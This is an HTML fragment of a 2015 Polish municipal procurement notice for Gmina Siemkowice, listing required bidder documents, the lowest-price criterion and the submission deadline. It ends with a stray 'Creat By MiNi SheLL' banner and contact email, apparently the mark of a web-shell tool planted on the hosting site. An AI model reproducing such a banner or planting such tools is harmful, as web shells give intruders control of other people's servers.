<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siemkowice.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Siemkowice 
ul. Plac XXX-Lecia PRL 1
98-354 Siemkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2015 godzina 13:00, miejsce: Urząd Gminy w Siemkowicach,  98-354 Siemkowice, ul.  Plac XXX-Lecia PRL 1 pokój nr 1 - sekretariat w terminie do dnia 12 listopada   2015 r., godz. 13:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 29 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com